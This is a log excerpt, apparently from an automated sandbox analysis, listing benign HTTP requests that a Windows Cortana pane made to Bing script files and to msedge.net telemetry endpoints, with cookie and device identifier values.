Source: global traffic	HTTP traffic detected: GET /rp/15KwNJ1E2lA1HV6BbJRyAXYo44E.br.js HTTP/1.1host: www.bing.comaccept: /referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: gzip, deflate, bruser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=22cef22c&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
Source: global traffic	HTTP traffic detected: GET /rp/2a5zh0ZIpVSs0HhW1xQBRsZz1Ek.br.js HTTP/1.1host: www.bing.comaccept: /referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: gzip, deflate, bruser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=22cef22c&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
Source: global traffic	HTTP traffic detected: GET /rp/4BpQ1bD8vX1mXuJObN-gg9RqkyQ.br.js HTTP/1.1host: www.bing.comaccept: /referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: gzip, deflate, bruser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045if-modified-since: Mon, 14 Oct 2024 19:38:35 GMTif-none-match: 0x8DCEC87CAFC6FD9cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=22cef22c&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
Source: global traffic	HTTP traffic detected: GET /rp/4TaH4o18x54UGQY5mQVwBbXDzpA.br.js HTTP/1.1host: www.bing.comaccept: /referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: gzip, deflate, bruser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=22cef22c&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
Source: global traffic	HTTP traffic detected: GET /rp/5qSqWyip_grL-s7BafaqI3Mrk9M.br.js HTTP/1.1host: www.bing.comaccept: /referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: gzip, deflate, bruser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045if-modified-since: Mon, 14 Oct 2024 19:42:59 GMTif-none-match: 0x8DCEC8868ADE5B1cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=22cef22c&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
Source: global traffic	HTTP traffic detected: GET /conf/v2/asgw/fpconfig.min.json?monitorId=asgw HTTP/1.1host: fp.msedge.netorigin: https://www.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: /accept-language: en-CHaccept-encoding: gzip, deflate, bruser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
Source: global traffic	HTTP traffic detected: GET /rp/Cm-j2OJKwOWyiyy_LY0s7IvC7Qc.br.js HTTP/1.1host: www.bing.comaccept: /referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: gzip, deflate, bruser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045if-modified-since: Tue, 26 Nov 2024 22:00:20 GMTif-none-match: 0x8DD0E65B838AF8Acookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=22cef22c&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
Source: global traffic	HTTP traffic detected: GET /rp/Cup3Is1bdaUS3C5__G12HeKRFUk.br.js HTTP/1.1host: www.bing.comaccept: /referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: gzip, deflate, bruser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=22cef22c&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
Source: global traffic	HTTP traffic detected: GET /rp/EZWKAkzgKyOdhH1NT8zm80mcnH4.br.js HTTP/1.1host: www.bing.comaccept: /referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: gzip, deflate, bruser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=22cef22c&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
Source: global traffic	HTTP traffic detected: GET /rp/F-9phXC_0uAqQQFuRafyV39z6Dk.br.js HTTP/1.1host: www.bing.comaccept: /referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: gzip, deflate, bruser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045if-modified-since: Tue, 11 Feb 2025 05:03:53 GMTif-none-match: 0x8DD4A597B271F69cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=22cef22c&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
Source: global traffic	HTTP traffic detected: GET /rp/FBodW3lwNP5Qe6iF-d8dpJdC9lc.br.js HTTP/1.1host: www.bing.comaccept: /referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: gzip, deflate, bruser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045if-modified-since: Thu, 10 Oct 2024 00:29:28 GMTif-none-match: 0x8DCE8C299FB56ADcookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=22cef22c&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
Source: global traffic	HTTP traffic detected: GET /rp/HblQIM5IGEhN4CVPKMIjlJHqY14.br.js HTTP/1.1host: www.bing.comaccept: /referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: gzip, deflate, bruser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=22cef22c&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
Source: global traffic	HTTP traffic detected: GET /rp/KS4jq8YC9OOOXT_rC7gR0M_1aN8.br.js HTTP/1.1host: www.bing.comaccept: /referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: gzip, deflate, bruser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=22cef22c&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
Source: global traffic	HTTP traffic detected: GET /rp/Kw-hqxyqLK6odmI-5H3LHnGRNUU.br.js HTTP/1.1host: www.bing.comaccept: /referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: gzip, deflate, bruser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=22cef22c&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
Source: global traffic	HTTP traffic detected: GET /apc/trans.gif?87976b596980857850532fa909f51f1b HTTP/1.1host: b-ring.msedge.netreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: image/png,image/svg+xml,image/;q=0.8,/*;q=0.5accept-language: en-CHaccept-encoding: gzip, deflate, bruser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
Source: global traffic	HTTP traffic detected: GET /rp/MYX7X3OSympejx7iZ4u3Rl1TwRA.br.js HTTP/1.1host: www.bing.comaccept: /referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: gzip, deflate, bruser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=22cef22c&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
Source: global traffic	HTTP traffic detected: GET /apc/trans.gif?98758aa62564c1822353726be6083611 HTTP/1.1host: b-ring.msedge.netreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: image/png,image/svg+xml,image/;q=0.8,/*;q=0.5accept-language: en-CHaccept-encoding: gzip, deflate, bruser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
Source: global traffic	HTTP traffic detected: GET /rp/RGSO4sEmvYv8wsttX4XoQuFoMMM.br.js HTTP/1.1host: www.bing.comaccept: /referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: gzip, deflate, bruser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=22cef22c&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
Source: global traffic	HTTP traffic detected: GET /rp/VrAE8CZ_PJkn0hgh2rwA1uThjyE.br.js HTTP/1.1host: www.bing.comaccept: /referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: gzip, deflate, bruser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045if-modified-since: Thu, 10 Oct 2024 00:31:38 GMTif-none-match: 0x8DCE8C2E76B0D4Dcookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=22cef22c&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
Source: global traffic	HTTP traffic detected: GET /apc/trans.gif?62429672578152eea57f84aafc162f64 HTTP/1.1host: spo-ring.msedge.netreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: image/png,image/svg+xml,image/;q=0.8,/*;q=0.5accept-language: en-CHaccept-encoding: gzip, deflate, bruser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
Source: global traffic	HTTP traffic detected: GET /rp/XKZ41694P7XbcLcfFJwPjCvgy20.br.js HTTP/1.1host: www.bing.comaccept: /referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: gzip, deflate, bruser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045if-modified-since: Thu, 10 Oct 2024 00:30:29 GMTif-none-match: 0x8DCE8C2BE5C5222cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=22cef22c&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
Source: global traffic	HTTP traffic detected: GET /apc/trans.gif?456f89d19c3134a687f24503b7eb5933 HTTP/1.1host: spo-ring.msedge.netreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: image/png,image/svg+xml,image/;q=0.8,/*;q=0.5accept-language: en-CHaccept-encoding: gzip, deflate, bruser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
Source: global traffic	HTTP traffic detected: GET /rp/ZnCCscMEmiOFOpkhdhTnOY5dhSY.br.js HTTP/1.1host: www.bing.comaccept: /referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: gzip, deflate, bruser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=22cef22c&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
Source: global traffic	HTTP traffic detected: GET /r.gif?MonitorID=asgw&rid=f90d9d78e1ee958148fa709861896dba&w3c=true&prot=https:&v=20190506&DATA=[{%22RequestID%22:%22b-ring.msedge.net%22,%22Object%22:%22trans.gif%22,%22Conn%22:%22cold%22,%22Result%22:668,%22T%22:1},{%22RequestID%22:%22b-ring.msedge.net%22,%22Object%22:%22trans.gif%22,%22Conn%22:%22warm%22,%22Result%22:130,%22T%22:1},{%22RequestID%22:%22spo-ring.msedge.net%22,%22Object%22:%22trans.gif%22,%22Conn%22:%22cold%22,%22Result%22:661,%22T%22:1},{%22RequestID%22:%22spo-ring.msedge.net%22,%22Object%22:%22trans.gif%22,%22Conn%22:%22warm%22,%22Result%22:129,%22T%22:1},{%22RequestID%22:%22t-ring-fdv2.msedge.net%22,%22Object%22:%22trans.gif%22,%22Conn%22:%22cold%22,%22Result%22:-1,%22T%22:1}] HTTP/1.1host: fp.msedge.netorigin: https://www.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: /accept-language: en-CHaccept-encoding: gzip, deflate, bruser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
Source: global traffic	HTTP traffic detected: GET /rp/bdzEveHhW1Yhm9BKZUNXT_TlOPk.br.js HTTP/1.1host: www.bing.comaccept: /referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: gzip, deflate, bruser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=22cef22c&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
Source: global traffic	HTTP traffic detected: GET /rp/h2m6AVCpDtS8Ff3ZxuDGx1A2-O8.br.js HTTP/1.1host: www.bing.comaccept: /referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: gzip, deflate, bruser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045if-modified-since: Thu, 10 Oct 2024 00:33:02 GMTif-none-match: 0x8DCE8C319B7C9BFcookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=22cef22c&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
Source: global traffic	HTTP traffic detected: GET /rp/ikpPfkLjP14eKCzM16ksiFVp92Y.br.js HTTP/1.1host: www.bing.comaccept: /referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: gzip, deflate, bruser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045if-modified-since: Thu, 10 Oct 2024 00:32:27 GMTif-none-match: 0x8DCE8C3047DE767cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=22cef22c&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
